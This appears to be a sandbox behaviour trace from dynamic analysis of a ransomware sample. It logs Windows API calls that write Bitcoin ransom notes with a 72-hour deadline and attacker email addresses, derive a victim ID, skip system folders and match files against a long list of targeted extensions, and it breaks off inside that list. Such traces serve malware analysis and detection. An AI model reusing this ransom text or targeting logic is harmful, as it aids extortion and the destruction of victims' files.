BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.660] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.664] CloseHandle (hObject=0x380) returned 1
	[0158.664] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.666] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0158.668] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.668] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.668] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.669] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.669] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0158.669] CloseHandle (hObject=0x380) returned 1
	[0158.669] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.670] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.670] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.670] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0158.670] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.671] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.671] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0158.675] CloseHandle (hObject=0x380) returned 1
	[0158.675] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.676] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.676] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.676] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0158.678] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.678] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.678] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.678] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.678] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0158.679] CloseHandle (hObject=0x380) returned 1
	[0158.679] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\*.*" (normalized: "c:\\users\\all users\\microsoft\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x781b3cb1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0158.680] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\*.*") returned 32
	[0158.680] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.680] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\*.*", cchLength=0x20 | out: lpsz="c:\\users\\all users\\microsoft\\*.*") returned 0x20
	[0158.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.680] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="windows") returned 0x0
	[0158.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.718] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="boot") returned 0x0
	[0158.718] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.718] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="system volume information") returned 0x0
	[0158.718] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.718] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.718] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.719] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="temp") returned 0x0
	[0158.719] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.719] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="program files") returned 0x0
	[0158.719] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.719] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.719] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.720] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="appdata") returned 0x0
	[0158.720] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.720] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="application data") returned 0x0
	[0158.720] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.720] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="winnt") returned 0x0
	[0158.720] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.721] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="tmp") returned 0x0
	[0158.721] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.721] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="cache") returned 0x0
	[0158.721] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.721] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.721] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.721] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="webcache") returned 0x0
	[0158.721] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="inetcache") returned 0x0
	[0158.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="nvidia") returned 0x0
	[0158.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.722] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="packages") returned 0x0
	[0158.722] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="cookies") returned 0x0
	[0158.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="programdata") returned 0x0
	[0158.723] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0158.723] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0158.723] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x781b3cb1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.724] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0158.724] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xd5e44e88, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5e44e88, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1
	[0158.724] lstrcmpW (lpString1="ClickToRun", lpString2="..") returned 1
	[0158.724] lstrcmpW (lpString1="ClickToRun", lpString2=".") returned 1
	[0158.724] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0158.724] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0158.724] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="ClickToRun" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun"
	[0158.724] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun"
	[0158.724] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0158.725] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0158.725] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*"
	[0158.725] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xd5e44e88, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5e44e88, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0158.745] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*") returned 43
	[0158.745] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.745] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\*.*") returned 0x2b
	[0158.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.745] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="windows") returned 0x0
	[0158.746] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.746] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="boot") returned 0x0
	[0158.746] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.746] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="system volume information") returned 0x0
	[0158.746] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.746] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.746] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.747] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="temp") returned 0x0
	[0158.747] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.747] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="program files") returned 0x0
	[0158.747] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.747] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.747] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.748] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="appdata") returned 0x0
	[0158.748] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.748] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="application data") returned 0x0
	[0158.748] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.748] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="winnt") returned 0x0
	[0158.748] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.749] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="tmp") returned 0x0
	[0158.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.749] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="cache") returned 0x0
	[0158.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.749] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.749] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="webcache") returned 0x0
	[0158.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.750] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="inetcache") returned 0x0
	[0158.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.750] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="nvidia") returned 0x0
	[0158.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.750] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="packages") returned 0x0
	[0158.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.751] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="cookies") returned 0x0
	[0158.751] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.751] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="programdata") returned 0x0
	[0158.751] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xd5e44e88, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5e44e88, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.752] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4BAD322A-C043-4DED-A97A-6FE0C4412FBE", cAlternateFileName="4BAD32~1")) returned 1
	[0158.752] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd58489b0, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd584c46a, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd584c46a, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9566930B-D1DD-4075-BFE6-74DD69B13189", cAlternateFileName="956693~1")) returned 1
	[0158.752] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d04153d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d04153d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d04153d, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x7b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeploymentConfig.0.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1
	[0158.752] lstrcmpW (lpString1="DeploymentConfig.0.xml", lpString2="..") returned 1
	[0158.753] lstrcmpW (lpString1="DeploymentConfig.0.xml", lpString2=".") returned 1
	[0158.753] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0158.753] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="DeploymentConfig.0.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml"
	[0158.753] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned 62
	[0158.753] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.753] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml") returned 0x3e
	[0158.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.754] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0158.754] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml") returned="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml"
	[0158.754] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml") returned 62
	[0158.754] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.754] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.755] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0158.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.755] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cy